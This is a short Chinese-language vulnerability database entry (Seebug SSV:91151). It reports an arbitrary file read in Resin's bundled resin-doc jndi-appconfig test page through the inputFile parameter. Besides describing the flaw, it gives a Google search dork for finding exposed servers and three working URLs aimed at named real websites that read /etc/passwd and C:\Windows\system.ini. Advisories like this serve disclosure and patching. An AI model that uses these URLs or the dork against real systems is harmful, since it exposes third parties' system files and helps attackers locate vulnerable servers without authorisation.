resin-doc 会议管理系统任意文件读取漏洞

2016-03-23T00:00:00
ID SSV:91151
Type seebug
Reporter fly520
Modified 2016-03-23T00:00:00

Description

http://..***/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=

inputFile参数可任意文件读取

<https://www.google.com/?gws_rd=ssl#q=inurl:jndi-appconfig%2Ftest>

google搜一下还可以搜到很多

比如:

<http://www.comatek.ru:8080/resin-doc/examples/jndi-appconfig/test?inputFile=C:\Windows\system.ini> <http://www.stationery.frontrunnerpro.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd> <http://ns1.soccerstat.net/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd>